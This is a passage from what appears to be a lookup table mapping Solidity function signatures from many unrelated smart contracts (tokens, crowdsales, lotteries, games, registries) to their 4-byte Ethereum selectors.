"hasMinBudget(address,uint256,uint256[])": "0xbd15e9ab", "getReferenceCurrency(address,uint256)": "0x869ac8dc", "setHiringDone(address,uint256,address)": "0xb2aeb260", "getPaymentType(address,uint256)": "0xbb5166e7", "getCreatedOn(address,uint256)": "0x01b5990c", "getContracts(address,uint256)": "0xe1d6e166", "addContract(address,uint256,uint256)": "0x8f33221e", "getSponsorshipsSortedByAmount(address,uint256)": "0x0cacbf21", "getSponsorships(address,uint256)": "0x152a3f28", "refundSponsorship(address,uint256,uint256)": "0x9205ec4d", "subJobSponsorshipsBalance(address,uint256,uint256)": "0xbfc4d11c", "getSponsorshipsTotalRefunded(address,uint256)": "0x8e95b0cd", "getSponsorshipsBalance(address,uint256)": "0x151b0bed", "getSponsorshipsTotal(address,uint256)": "0x49c3a91e", "addSponsorshipsTotalRefunded(address,uint256,uint256)": "0xf221b25b", "addSponsorshipAmount(address,uint256,uint256)": "0xa2f37360", "addSponsorship(address,uint256,uint256)": "0xb60a82e0", "getSkills(address,uint256)": "0x764e5cd9", "setSkills(address,uint256,uint256[])": "0x303ed73a", "getApprovals(address,uint256)": "0x1d47f8c1", "clearSponsorableJobApprovals(address,uint256,address[])": "0x61fec3a4", "isSponsorable(address,uint256)": "0x3cd1b6b1", "isAllowedUser(address,uint256,address)": "0x3769862f", "getAllowedUsers(address,uint256)": "0xbb87c1f2", "isSponsorableJobApproved(address,uint256,address[])": "0xedd3ff84", "approveSponsorableJob(address,uint256,address)": "0x0cd2b327", "approveSponsorableJob(address,uint256,address,address[])": "0xbf46ad1d", "setJob(address,uint256,address,string,string,uint256[],uint256,uint256,uint8[],uint8,bool,address[])": "0x3f7c42a7", "getJobCount(address)": "0x6830cdc4", "ParticipantAgent(string,address)": "0xec933789", "create(string,string,uint8,uint256,address,string,address)": "0xe9fd74dc", "getBalanceOf(address)": "0x9b96eece", "close_down()": "0xef6b329a", "remove_quote(bytes32,bytes32)": "0x542a90bd", "add_quote(bytes32,bytes32,uint256,uint256)": "0x9b7812ff", "redeem_funds(address,uint256,uint256,bytes32)": "0xa6ded200", "make_transfer(address,uint256,uint256,bytes32)": "0xa1bb7828", "get_liquidity_account(address)": "0x2f443315", "get_bank_data(address)": "0xf564ea7e", "many_payments()": "0xcf6b70cf", "many_currencies()": "0x9272e3f5", "many_cryptobanks()": "0x909d22c7", "payment_returned(uint256)": "0xda5abf5d", "execute_payment(uint256,bytes32)": "0xb70ae49a", "create_payment(uint256,uint256,bytes32,bytes32,uint256,address,bytes32)": "0x58af7794", "generate_paymentID(uint256)": "0x33f08327", "paymentsProcessor()": "0xa5374005", "get_status(uint256)": "0x650d5d6b", "get_receiverCryptobank(uint256)": "0xc256ea58", "get_senderCryptobank(uint256)": "0xed9b0107", "get_termAmount(uint256)": "0x628da35e", "get_baseAmount(uint256)": "0x47198cd1", "RaffleTshirt(string,uint256)": "0x34bbabbd", "GustavoCoinCrowdsale(uint256,uint256,uint256,address)": "0x8196410b", "testInitialA()": "0xc6cf452b", "addProducer(bytes32,uint256,bytes1)": "0x9f54c01c", "createProducer(bytes32,uint256,bytes32)": "0xc276086f", "certify(address)": "0x14253887", "createNewCertifier()": "0x1a182801", "Certifiers()": "0x2af7c4d7", "getWarehouseByAddress(address)": "0x10eaf707", "getVehicleByAddress(address)": "0xcf564ab5", "vehicleDatesByCity(bytes32)": "0xc59d278e", "vehiclesByCity(bytes32)": "0xc8dc60ca", "vehicles()": "0xcae3d482", "vehicleDates()": "0x589fd72a", "warehouses()": "0x2b1ed01a", "purchaseVehicleSpace(address,uint256,uint256)": "0x3207230d", "purchaseWarehouseSpace(address,uint256,uint256)": "0xb0407315", "addVehicle(uint256,uint256,bytes32,bytes32,uint256,uint256)": "0xa6ff20a3", "addWarehouse(uint256,uint256,bytes32)": "0xdd8c8855", "Depot()": "0x89b4a36f", "getDeedInfo(address)": "0x96c237b4", "getRecord(bytes32)": "0x213681cd", "getBuyPriceAndPreviousRecord(bytes32)": "0x6955c8fc", "transferRecord(bytes32,address,uint256)": "0xca59f45b", "getDeed(bytes32)": "0xff2f7a35", "deleteOffer(bytes32,address)": "0xba35749c", "acceptOffer(bytes32,address,uint256)": "0x6ae6151e", "cancelOffer(bytes32)": "0xf952279e", "newOffer(bytes32,string)": "0x5edd4436", "deleteRecord(bytes32)": "0x8c0dacf2", "reclaim(bytes32)": "0x96afb365", "deList(bytes32)": "0x56e9d1f3", "newListing(string,uint256,string)": "0x70c4ce24", "sha(string,string)": "0xf82f396f", "setMinimumOfferPrice(uint256)": "0xc16d3344", "getCreationDate()": "0xb90c1dbb", "getCallCount()": "0xa96b2dc0", "vote(uint256,uint256,uint256)": "0x8a6655d6", "newProposal(string,bytes)": "0x4c6b6cad", "exp()": "0xab60ffda", "selfDestruct(address)": "0x3f5a0bdd", "ForksTestContract()": "0xd8ac26c0", "getCreateShareTokenOutcomeValue()": "0x06b5760d", "getCreateShareTokenMarketValue()": "0xd2ef3b0d", "getCreateShareToken(uint256)": "0x193c9be1", "getCreateShareTokenCounter()": "0xea93a324", "resetCreateShareToken()": "0x16fc1e64", "addSomething(uint256)": "0x964afe08", "KudosToken()": "0xe225c56b", "Shareable(address[],uint256)": "0xf96f2fa1", "bar()": "0xfebb0f7e", "ProxyUser(address)": "0x5a354e04", "transferOwnerToTest()": "0x2acd7e41", "transferOwnerToProxy()": "0xc2fc048a", "testTransferControl()": "0x1e5b433b", "testDistributing()": "0xc9553010", "delegatedFwd(address,bytes)": "0xe4fab06f", "makeConcept(address[],uint256[],uint256,bytes,address)": "0x7894d1d0", "getSharedAccountsLength()": "0x6fca2023", "getSharedAccounByIndex(uint256)": "0x87a07adb", "getSharedAccountPw(bytes32,bytes32)": "0x7a79940d", "deleteSharedAccount(bytes32,bytes32,uint256)": "0xaa27cdf2", "AddSharedAccount(bytes32,bytes32,bytes32,address)": "0xe1c7f06a", "getContactsLength()": "0x7713b431", "getContactAddressByIndex(uint256)": "0x91f39f10", "getContactByIndex(uint256)": "0x14ff89cd", "getTargetContactPubKey(address)": "0x9de315f1", "deleteContact(address)": "0x1046bc68", "AlterContactPubkey(address,bytes32,bytes32,bytes32,bytes32)": "0xb79eb3a4", "AlterContactName(address,bytes32)": "0xda7e019e", "AddContact(address,bytes32,bytes32,bytes32,bytes32,bytes32)": "0x9994e112", "getSocialAccountsLength()": "0x0cba6d27", "getSocialAccountByIndex(uint256)": "0x9b8eb7b4", "getSocialAccountPw(bytes32,bytes32)": "0x4259701b", "DelSocialAccount(bytes32,bytes32)": "0x89a7adcc", "AltSocialAccountPw(bytes32,bytes32,bytes32)": "0x47ec8d82", "AddSocialAccount(bytes32,bytes32,bytes32)": "0xe35d3590", "getPublicKey()": "0x2e334452", "setPublicKey(bytes32,bytes32,bytes32,bytes32)": "0x1359fc91", "UserAccount(bytes32,bytes32,bytes32,bytes32,bytes32)": "0xc83281e9", "setCounter(uint256)": "0x8bb5d9c3", "disable(address[])": "0xfd30929a", "enable(address[])": "0x1b75738a", "GazeCoinCrowdsaleWhitelist()": "0xdd6c1394", "removeAdministrators(address)": "0x3dde3918", "addAdministrators(address)": "0x93cd22b8", "SimpleSavingsWallet(uint256)": "0x12286715", "createSignedMessageOracle(bytes32,uint8,bytes32,bytes32)": "0x655d0862", "vanishCoins(uint256)": "0x8fd8b429", "issueNew(uint256)": "0xc475cdf5", "Pokecoin(uint256,address,address)": "0x8f9139fb", "updatePokeMarketAddress(address)": "0x219f5052", "inGroup(address)": "0x2048cba4", "queryParent()": "0x5ce5ba9b", "queryChildLength()": "0xc065ecc2", "queryChild()": "0xe4be5159", "queryAccounts()": "0xcc798890", "queryName()": "0x379725ee", "queryInfo()": "0x2c560ec0", "addChild(address)": "0x1eee993a", "deleteChild(address)": "0x8ea7296b", "updateName(bytes32)": "0x1ae97bd9", "deleteAccounts(address[])": "0x0846ca3c", "addAccounts(address[])": "0xac71abde", "Group(address,bytes32,address[])": "0x359819cc", "EthlanceSearchFreelancers(address)": "0x76389260", "getInstantiationCount(address)": "0x8f838478", "SmartToken(string,string,uint8)": "0x2bdf66d5", "removeAdvisor(address)": "0x0eeccb84", "nobodyCanDoThis()": "0x420d0ba4", "eitherAdminOrAdvisorCanDoThis()": "0x63a5bc71", "onlyAdvisorsCanDoThis()": "0x16aabcbd", "onlyAdminsCanDoThis()": "0x4fd3d125", "RBACMock(address[])": "0x80a0155c", "get_flag()": "0x057c3cf5", "test_oneTrueAndFalseAssert()": "0x9ac22e5b", "test_twoTrueAsserts()": "0xf33146af", "test_twoFalseAsserts()": "0x39903398", "test_oneTrueAssert()": "0x1145a49c", "test_oneFalseAssert()": "0xeb6779d4", "setFeeWallet(address)": "0x90d49b9d", "getAdminStatus(address)": "0xc5efea68", "setAdminStatus(address,uint256)": "0xac12bf92", "MyTestingToken()": "0x3176bd18", "_sell(address,uint256,bytes)": "0xc4085bf6", "_buy(address,uint256,bytes)": "0x7fc729c2", "sell(uint16,uint16,uint8,address,uint256)": "0x55ae603e", "setSellPrice(uint16,uint16,uint8,address,uint256)": "0x65d27248", "setBuyPrice(uint16,uint16,uint8,address,uint256)": "0x5f5e38b6", "share(address,address)": "0x517a9d64", "updateTokenAge(address,address)": "0x77e2965b", "updateGlobalTokenAge()": "0x9441268b", "maixiaohetoken(uint256,string,uint8,string)": "0xb6cdc815", "DyginoteToken()": "0x21b68d2b", "incrementBasketsBurned(uint256,address)": "0x97ee041b", "incrementBasketsMinted(uint256,address)": "0x4d91d4f1", "getBasketArranger(address)": "0x90d28075", "getBasketDetails(address)": "0xf6ed4b71", "checkBasketExists(address)": "0x645bcd3a", "registerBasket(address,address,string,string,address[],uint256[])": "0x52a0b5ac", "whitelistBasketFactory(address)": "0x62c49256", "BasketRegistry()": "0x2b4143bd", "creedex(address,address,address,uint256,uint256,uint256)": "0xd51e1737", "ScooterCoin()": "0x7e815fb4", "BalanceOnlyOwner()": "0x03856d15", "ipfsAddress()": "0xe1b40a76", "saveString(string)": "0xdb52e130", "saveBytes(bytes32)": "0x8b05afd2", "base58Address(bytes)": "0xbcae19f4", "SSDDTT(uint256,string,string)": "0x2757a07c", "AngelCoinV1()": "0x8d119d41", "HyperTestToken()": "0x3146d282", "getTribe(string)": "0x809d8988", "newTribe(string,string)": "0x3d1d4703", "updateTribeProducts(address)": "0x42a63361", "TribePlatform()": "0x5f956244", "createProduct()": "0x14d75e9d", "abortCrowdfund()": "0x599466fe", "fundOf(address)": "0x5e047822", "fundCrowdfund()": "0x39300836", "payoutOf(address)": "0x6da61d1e", "setCrowdfundPayout(address,uint256)": "0xfb4a18a2", "startCrowdfund(uint256,uint256)": "0x846b055a", "createProduct(string,bool,uint256)": "0x9b58e46b", "Tribe(address,string,string,address)": "0x44ace7c3", "unRedeem(uint256)": "0xe437d1a7", "tokenTribe(uint256)": "0x652106d8", "productTribe(string)": "0xd3309a7e", "tokenProduct(uint256)": "0x02ae8cdc", "tribeTokens(address)": "0x34d2485c", "productTokens(string)": "0x69dfae6e", "tribeProducts(address)": "0x940147ac", "productPrice(string)": "0x5f1877a8", "productOwner(string)": "0xfed39929", "buyProduct(string)": "0x364e022f", "createProduct(string,bool,uint256,address)": "0x28916184", "TribeProducts()": "0x47cda525", "PowerGiggs()": "0x6bb35840", "ObsToken()": "0xefbcebe5", "GetGuestQueueNumber()": "0x6be9a8df", "CheckSign(string,string)": "0x4bd4e770", "Sign(string,string)": "0x0350d085", "SignumToken()": "0xbd1baedb", "TokenCoin5()": "0x890ede44", "selectWinners(uint256)": "0x39a2eb2a", "startSelection()": "0xd85b559f", "generateRand(uint256)": "0x1d732304", "getOrderBook(address,address)": "0x203d39ff", "refundSeller(address,address,uint256)": "0xfd0edbd6", "escrowDeletion(address,address,uint256)": "0x938d2f46", "removeEscrow(address,address,uint256)": "0x94dbe74e", "acceptEscrow(address,address,uint256)": "0xe31430c0", "mocatoken()": "0x5bc5cf42", "MeowToken()": "0x2072343e", "Volunteertimedollartocken()": "0xf4e83593", "SampleToken()": "0x6b13fabf", "YKToken()": "0x1eabef31", "getNumbersFromString(string,string,uint32)": "0xaff57736", "mapToNewRange(uint256,uint256,uint256)": "0x04fe947c", "updateNextStealTimeByOperator(uint32)": "0x528626fc", "setIntervalTimeAdjust(uint8)": "0x5de97c8d", "setMaxArtworks(uint16)": "0x9e918c0a", "setEtherExchangeLikeCoin(uint32)": "0x9d1d14e0", "setOraclizeGasExtraArtwork(uint32)": "0x7cb1bb0b", "get30Artworks(uint16)": "0xbb5e9dec", "getNumArtworksXType()": "0x765af8bf", "updateNextStealTime(uint32)": "0xe9fa65aa", "removeArtworksByString(string,uint32)": "0x01061ae1", "findIndexFromRandomNumber(uint32)": "0x9d85fca3", "triggerSteal(uint32,uint256)": "0xe9f3b9ee", "timeTillNextSteal()": "0xcef9601f", "triggerStealManually(uint32)": "0xdeda2f9d", "sellArtworks(uint32[])": "0x53fd0670", "sellArtwork(uint32)": "0x1b40ee88", "setOldest()": "0x48c7f438", "getOldest()": "0x7d02bc1c", "replaceArtwork(uint16)": "0xdf6afed9", "giveArtworks(uint8[],address,uint256)": "0x993eda02", "init1()": "0xf2eb3e34", "setCosts(uint128[])": "0x353db436", "proposalData(string,address,uint256,bytes)": "0x39737ea4", "unseatKing(address,uint256)": "0x39341dde", "KotET2()": "0xc6ab5429", "calculateNewPrice()": "0x642bdd15", "calculateCompensation()": "0x121b5a25", "KotET()": "0xcd55205b", "BancorGasPriceLimit(uint256)": "0x50a22ee1", "mock_throwIfNotRemoved(address,address)": "0xbc9f31e3", "mock_resetLatestPayday(address,address)": "0x6f8f1de5", "mock_resetLatestTokenAllocation(address,address)": "0xae75f9e6", "testUser()": "0xc5c680f3", "funcFromC1()": "0x2462a0d5", "Mappings()": "0xe54d8ccb", "getCurrentTranche(uint256)": "0x8a8e2028", "getLastTranche()": "0x3a645c6d", "getFirstTranche()": "0xa2d24c5e", "getTranche(uint256)": "0xd972e8ad", "TokenTranchePricing(uint256[])": "0xf5ad9034", "getMappingElement(uint256)": "0x6446afde", "getTokenBalance(address,address,bytes32)": "0x88369d6b", "hashValue(bytes32)": "0x2e0cb498", "setSecret(bytes32)": "0x35a9c82f", "addModerator(address)": "0xb532e4cb", "withdrawWinnings(uint256)": "0x14794702", "setWagerWinner(uint256,address)": "0x4d628c44", "counterWagerAndDeposit(uint256)": "0xdfce791a", "createWagerAndDeposit(bytes32)": "0xe9734172", "newDeposit(uint256)": "0x3f478372", "createWager(bytes32)": "0xde5ac86d", "getWagerCount()": "0xd83aabbe", "getLossCount(address)": "0x5ae17907", "getWinCount(address)": "0xe0832cf6", "getWager(uint256)": "0x7a2756f2", "isModerator(address)": "0xfa6f3936", "state(uint256)": "0x3e4f49e6", "Registrar(address)": "0xcadec1b2", "getActiveState()": "0x6abac115", "Deposit(address)": "0x8ce0bd46", "set_master_exchange_rate(uint256)": "0x6faed0e5", "get_transaction_by_row(uint256)": "0x172b95e1", "NFOCoin(uint256,string,string)": "0x0e06e7ef", "nfo_transaction(uint256,uint256,address,address,bytes32)": "0xc62072d2", "make_hash(uint256,uint256,address,address,uint256,uint256)": "0x11883c6d", "get_pvn_token_balance(address)": "0x5c084a25", "get_token_balance(address)": "0xd472d6bf", "get_eth_balance(address)": "0x95966c3b", "get_transaction_count()": "0xd8772e79", "is_transaction(bytes32)": "0x2f24bdc7", "transfer_token_from(address,address,uint256)": "0x695b4700", "isNull(address[])": "0x6d4fd0ad", "exist(address,address[])": "0x50a58b3f", "index(address,address[])": "0xf62732b8", "devuelvePuntuaciones(bytes32)": "0x22fefe31", "devuelveEncuestados(bytes32)": "0x25ce77a0", "devuelveToken()": "0xf151e4ae", "devuelveTodasEncuestas()": "0x5ac26ebd", "registraToken(bytes32)": "0x96023cbf", "eliminarVotacion(bytes32)": "0x6641cc27", "createVotacion(bytes32,bytes32[],uint256[])": "0x663d1e84", "vota(bytes32,bytes32)": "0x0878424f", "Votaciones(bytes32)": "0x677a7444", "publisherCount()": "0xf5eed98d", "publishers(uint64)": "0x991ef443", "ssp()": "0xa231a84f", "addPublisher(string,bytes,address,address[],uint256[],address,uint32[])": "0xfcb927aa", "SspContract(address,address,address,uint256,string)": "0xd0b9e58b", "applicationRejected(address,address)": "0x9371c369", "applicationApproved(address,address)": "0x03e3b1ed", "isMembershipAllowed(address)": "0x189eeebe", "processWithdrawalForAccount(address)": "0x13c2beff", "withdrawApplication()": "0x1fcf55ff", "purchaseMembership()": "0x47bbe867", "changeDuration(uint256)": "0xb594f086", "date_string(string,int8,int8,int16)": "0x9664ca94", "get_king_address(address)": "0xf147df3b", "get_king_price()": "0x33e85eac", "is_king_for_sale()": "0x1ed64f7b", "is_king_found()": "0x4b77d17d", "king_of_returning_shirts()": "0xe6d20a23", "buy_king()": "0xce376aa3", "set_for_sale(uint256)": "0xbdd3fea0", "change_king_name(string)": "0x1030adea", "update(uint256,string)": "0xf745630f", "submit(string,int8,int8,int16,string)": "0xcd568d0f", "PostIL()": "0x7c2d2326", "RemoveAllConsentDirectives()": "0x882bc3e1", "GetConsentDirectives()": "0x9f59fc5a", "GetConsentDirective(uint256)": "0xb04a1680", "GetConsentDirectiveCount()": "0x83054b6a", "Patient(address)": "0xdd8bd8cb", "testCheckRokBalance()": "0xf0a2bea2", "testCheckSavecEthBalance()": "0x262fe547", "testCheckEthBalance()": "0x5f024e91", "testIsSuccessful()": "0xa47abd0f", "testTokenBalance()": "0x0b88e06b", "testIsComplete()": "0x47b27fd0", "testIsStarted()": "0x61001cd3", "testInitialCrowdsale()": "0x878d4204", "removeBackdoor()": "0x2736a558", "recoverFundsAndDestroy()": "0x928161ca", "K_INITIAL_SUPPLY()": "0xfc26088e", "getSecurityLimits()": "0x48ec8a0c", "otc()": "0x36b61e3c", "secondPrivateLockedAmount()": "0x19e860c1", "ROLE_BURN()": "0xbb34e57c", "deathData_a8()": "0x6d893a5a", "oraclizeFees()": "0x8bd53bea", "walletOwner()": "0x1ae879e8", "SOSBOTTOM()": "0x30599ba7", "increaseTimeBy()": "0xc6eeeb04", "SALE_ALLOCATION()": "0xde1b27f5", "quater4()": "0x0ec48a42", "cfo()": "0x1ed20347", "roundDeadline()": "0xaf8532e3", "genTime()": "0x1c3c050c", "canUpdatePercentToTakeAsSeed()": "0x73a3d9e4", "tokensSell()": "0x4e275295", "minimumPrepaidClaimedPercent()": "0xd0f13638", "fundingWallet()": "0x3c4b40b8", "dynasty()": "0x7060054d", "getSealDate()": "0xb8aa0a34", "burnRemaining()": "0xd6a78004", "versionIdent()": "0x2ca60d85", "BURNABLE_UP_TO()": "0xf1771cf0", "twitterBotAddress()": "0x15183e2f", "minEnterFee()": "0xff739e40", "STAGE3_TIME_END()": "0xd7a1192d", "gmtFundAddress()": "0xd27fcf96", "extraDistributionPart()": "0xd69c9275", "mintA()": "0xd6e0d73c", "isFoundationSupplyAssigned()": "0x41ea59a9", "communityAllocation()": "0xd53b4ab4", "startICO_20_December()": "0x2faa2998", "eth_balance()": "0x306c7290", "backEndOperator()": "0x050895ff", "crowdsaleSuccess()": "0x10c1ff21", "year3Unlock()": "0x458c9ca4", "CATContract()": "0xd17222dc", "ICO_TIER_LAST()": "0xd954bd4a", "quota()": "0xcebe09c9", "sideBetPercent_MAX()": "0xaa3dacac", "is_open()": "0xd659d968", "soldIdeaWeiIco()": "0xa25b859d", "bacFund()": "0xacda28a1", "allocatedStage()": "0xef8a9c8f", "investorSupply()": "0xdc79d069", "date()": "0x323046b1", "voteCount()": "0xc6384071", "SALE_START()": "0x22673030", "getMetadataURL()": "0x42ff1c1a", "lastProcessedDay()": "0x308af165", "noBets()": "0xd23f1bba", "totalGenesisRecipients()": "0xfda962d3", "freeForAll()": "0x4ebfd6e8", "PRCT100_D_TEAM()": "0x89473a0e", "RTB1()": "0x993ca7e3", "buyMorty()": "0x18128ec7", "contractDeployedTime()": "0xe1727fc6", "whitelistEnable()": "0xcec4ab9c", "coinAllocation()": "0xe399331b", "transferCreditBotAddress()": "0x159fb416", "SECONDS_PER_MINUTE()": "0xe9556430", "getAllocations()": "0x65ed6e23", "basicPresaleRate()": "0x22bc98b1", "SaleDeadline()": "0xbc05529b", "PresaleAddress()": "0xe660c7aa", "ethUsdRate()": "0x3b478fc5", "WLMTBounce()": "0xf47599db", "originalRate()": "0x09b2996a", "totalPayoutAmount()": "0xe7efcfc2", "tokensPerWei10()": "0x5e520c29", "icoStage()": "0xfc00234e", "timeoutBlock()": "0x688511bb", "lccxTeamTokensVesting()": "0xf57fc26a", "transferrableTime()": "0xbf15ea76", "TOKEN_OFFERING_ALLOWANCE()": "0xf0d4753e", "withdrawnMelon()": "0x5055d7c3", "crowdsaleContinue()": "0xe4b3c517", "tixPromo()": "0x5ef82429", "ItemCreatePrice()": "0x88e16190", "InterfaceId_ERC721()": "0x819ee03a", "fundType()": "0x1fa98406", "tokensTeamBlockedTimestamp()": "0xb23096e9", "oldSeeleToken()": "0x20bf92ca", "maxSellRateInPrecision()": "0x0f9b5129", "channelsLimit()": "0x165a0e03", "goldBalance()": "0xae77a6f4", "goldPrice()": "0x44501404", "angelAmountRemaining()": "0x402a1533", "lastProcessedVaultId()": "0x7c5b5b06", "crowdsaleEndTime()": "0x1d545d09", "getDataNum()": "0x89231bcc", "durationh()": "0x7b266b21", "erc20Store()": "0xf602c312", "player4Timestamp()": "0x524e915d", "ETHcollected()": "0x21424e7d", "upgrader()": "0xaf269745", "addEthForPayment()": "0xf49808ea", "ICO_PROMO_REWARDS()": "0xcc743a86", "creationFee()": "0xdce0b4e4", "setBleachPrice(uint256)": "0x14ca6e01", "getMixingResult(uint256,uint256)": "0x05d258dd", "baseSummonPrice()": "0x04f7a69d", "withdrawSale(uint256)": "0x02ce8ac9", "withdrawCooldown(address)": "0xd82745c8", "getLandmark(uint256)": "0xbfa5f1f7", "priceOfLandmark(uint256)": "0x9c66fe00", "ceo()": "0x908921fc", "createLandmark(uint256,uint256,address,uint256)": "0x73e4d829", "transactions()": "0x18015191", "coo()": "0x07cdee49", "newIdTankHull()": "0xecaaf6c8", "newIdAuctionEntity()": "0xe542e7c5", "createNewTankHull()": "0xd8754716", "TankSellMaster()": "0xd09677df", "ExportMaster()": "0xb7e83329", "exportTankResetEarning(uint32)": "0xaa4ac835", "getProductEarning(uint32)": "0xaa077992", "howManyTanks()": "0xa8ae5eb8", "tanksBeforeTheNewTankType()": "0xa324f8bf", "newIdTankWeapon()": "0xa19c406a", "sellTank(uint32,uint256,uint256,uint256)": "0x97fa346d", "createNewTankWeapon()": "0x90a251da", "getTankOwner(uint32)": "0x8f426437", "ChangeUpgradeMaster(address)": "0x8f3956a4", "getTankTotalEarned(uint32)": "0x8d81e2c0", "getTankProduct(uint32)": "0x86d6c8a0", "cashOutTank(uint32)": "0x8301fb2e", "ChangeTankSellMaster(address)": "0x72411849", "getTankAuctionEntity(uint32)": "0x70a06777", "buyTank(uint32)": "0x6e233918", "canExport()": "0x6cd8f433", "exportTank(address,uint32)": "0x68999d76", "getTankEarning(uint32)": "0x5b0d5b55", "newIdTank()": "0x4ceab75e", "UpgradeMaster()": "0x4a367d73", "newIdTankProduct()": "0x48318cbc", "getTankDetails(uint32)": "0x455fea46", "getCurrentPrice(uint32)": "0x3ea0fb3e", "ChangeAuctionMaster(address)": "0x3b61f5f5", "upgradeTank(uint32,uint8)": "0x21b920eb", "getTankName(uint32)": "0x215de791", "getTankSell(uint32)": "0x1e5571bc", "getCurrentPriceAuction(uint32)": "0x09ca4b76", "FinishedExporting()": "0x09c25e6c", "noDuplicates(bytes)": "0xfeb272e4", "intervalTime()": "0xfd3c9144", "setDrawer(address)": "0xf5720769", "numbersCountMax()": "0xf4703d26", "checkTickets()": "0xf3e71756", "dividendsPercent()": "0xf2c0cdbe", "nextPrice()": "0xef9089d6", "setWinPercent(uint256[])": "0xe9e22362", "dividendsWallet()": "0xe2c8dd34", "prPercent()": "0xdf755a98", "drawGame(uint256,string)": "0xdf6e1331", "numbersCount()": "0xd86b2982", "setGasMin(uint256)": "0xd6e78eb0", "buyTicket(uint256[],address)": "0xd0ad7fb8", "setNextStartTime(uint256)": "0xcf3630b4", "transferFromBalance(uint256,address)": "0xc09fed25", "addBalance()": "0xb163cc38", "setTechnicalPercent(uint256)": "0xb10d5a52", "getGames(uint256,uint256)": "0xac451185", "setBonusAddress(address,bool)": "0xa965e5c1", "getPlayerTickets(address,uint256,uint256)": "0xa56d7601", "disableBuyingTime()": "0xa0c95e24", "setJackpotGuaranteed(uint256)": "0x9fb1b5fb", "closeCurrentGame(uint256)": "0x9c2f5f8f", "setTechnicalWallet(address)": "0x9a2828f3", "addReserve()": "0x91df0c08", "setDividendsPercent(uint256)": "0x90905360", "technicalWallet()": "0x8f52da60", "gameIndexToBuy()": "0x7e342507", "setDividendsWallet(address)": "0x78831b36", "isNeedDrawGame(uint256)": "0x75bbc15d", "getWins(uint256,uint256,uint256)": "0x6abd3b88", "closeTime()": "0x627749e6", "isNeedCheckTickets()": "0x60e9c78b", "checkGameIndex()": "0x5c9c5a6f", "jackpotGuaranteed()": "0x57dd8366", "gameIndex()": "0x5654a341", "needToReserve()": "0x54b84910", "setDisableBuyingTime(uint256)": "0x54aa4e44", "prWallet()": "0x50e343d0", "setPrWallet(address)": "0x4830868b", "setBuyEnable(bool)": "0x45c1c9fc", "setPrPercent(uint256)": "0x43f3d27c", "winPercent(uint256)": "0x419eafdc", "buyEnable()": "0x3d389faf", "gasMin()": "0x3cea6965", "getWinNumbers(string,uint256,uint256)": "0x3cd510ee", "setNeedToReserve(uint256)": "0x3b9f87a5", "setTicketCountMax(uint256)": "0x38d28d4c", "isNeedCloseCurrentGame()": "0x246a44f8", "setNextPrice(uint256)": "0x23037a85", "technicalPercent()": "0x219dc688", "drawer()": "0x11bc5315", "games(uint256)": "0x117a5b90", "setIntervalTime(uint256)": "0x0d63e87d", "premiumMod()": "0x758b31df", "setBigPrice(uint256)": "0x671bd594", "setBridgeHeight(uint256)": "0x60a10fa7", "grid(uint256)": "0x51d2cc8f", "mediumPrice()": "0x509d6d72", "getLocksLength()": "0x489c18b0", "bigPrice()": "0x3eed3822", "buy(uint32,uint16,uint32,bytes16,bytes32)": "0x3960c001", "setBridgeWidth(uint256)": "0x3814b764", "setMediumPrice(uint256)": "0x29723ade", "_checkGrid(uint256,uint256,uint256)": "0x23dc3f72", "getLockById(uint256)": "0x08f12470", "options(bytes32,address,address)": "0xf2dbe0f8", "writesExercised(bytes32,address)": "0xdf7b70ab", "cancelled(address,bytes32)": "0xd387978d", "withdraw(address,uint256[3])": "0xc92f8954", "cancel(bytes32)": "0xc4d252f5", "withdrawal(bytes32,address)": "0xbfb8a319", "broker()": "0xabff0110", "exercise(uint256,uint256[3],address)": "0xa98ca17d", "optionsExercised(bytes32,address,address)": "0x90126acf", "writes(bytes32,address)": "0x780c5689", "filled(bytes32)": "0x288cdc91", "takeOrder(uint256,uint256[5],uint256[3],bytes32[3])": "0x18ebcc8c", "getTulip(uint256)": "0xfecd3486", "buyTulip(bytes32,uint16)": "0xee0f809e", "upgradeContract(address)": "0xeb2c0223", "nextPrice(uint16)": "0xdf0c7a55", "withdrawBalance(uint256)": "0xda76d5cd", "increasePeriod()": "0xd63e6ce7", "price(uint16)": "0xb95bb4f8", "buyTulips(uint32,uint16)": "0xb7c9da33", "tulips(uint256)": "0xaf794a4f", "addGen(uint256)": "0xaed2e7d4", "myTulipsBatched(uint256,uint16)": "0x9d5708ff", "tulipToApproved(uint256)": "0x72a0c16e", "newContractAddress()": "0x6af04a57", "setMaintenance(bool)": "0x612f2f37", "underMaintenance()": "0x5a41217e", "genToStartPrice(uint256)": "0x45f28e77", "tulipToOwner(uint256)": "0x36e4e8fd", "renameTulip(uint256,bytes32)": "0x26605772", "deprecated()": "0x0e136b19", "myTulips()": "0x01ebebf2", "updateMinMaxBetCount(uint256,uint256)": "0xae1f91b7", "updateMinMaxBetPrice(uint256,uint256)": "0x629bf9a8", "getPendingBetCount()": "0x9160aabc", "play(uint256,uint256,address)": "0x7c66ae22", "destroyAndSend(address)": "0xf5074f41", "forceExecuteRandomQuery()": "0xdec22b07", "gameState()": "0xd1f9c24d", "betStats()": "0xc2a8ec80", "columns()": "0xabd2adbb", "maxBets()": "0xa61d0aed", "payouts()": "0xa247bc32", "minBets()": "0x92749978", "safeBalance()": "0x88780b8e", "maxBetPrice()": "0x7fcd3ce2", "updateSafeBalance(uint256)": "0x70185b7e", "blackMask()": "0x68fff456", "maxNumber()": "0x3a4f6999", "bets(uint256)": "0x22af00fa", "minBetPrice()": "0x229f4caf", "updateRandomNumber(uint256)": "0xdc20d6e7", "addMockPendingWinner(address,uint256)": "0xd74ea11e", "updateOraclizeGas(uint256,uint256)": "0xf450096f", "retryWinner(uint256)": "0xf40e8d8b", "updateTicketPrice(uint256)": "0xf02137c8", "addCascade(address,uint256)": "0xef685294", "updateRandomSource(uint256)": "0xe9b1f1ce", "gameId()": "0xd7c81b55", "randomNumber()": "0xccbac9f5", "withdrawWinnings()": "0xcc42e83a", "deleteCascade(uint256)": "0xcbe566de", "forceRefund()": "0xbd7427f8", "retryWinners()": "0xb2c50b92", "getJackpot()": "0x9329066c", "pendingWinners(uint256)": "0x91ac96a9", "updateFee(uint256)": "0x9012c4a8", "totalPendingPayments()": "0x87526b0a", "drawTicketCount()": "0x83a07765", "forceChooseRandomWinner()": "0x82ade405", "pendingPayments(address)": "0x7f38e526", "getTicketHolderCount()": "0x7b3d398f", "cascades(uint256)": "0x5e8023d1", "raffleState()": "0x55c81595", "updateRewardDistributor(address)": "0x497cd426", "purchaseTicket(uint256,address)": "0x3d0c7eb6", "totalCascadingPercentage()": "0x3abdad4e", "getProjectedJackpot()": 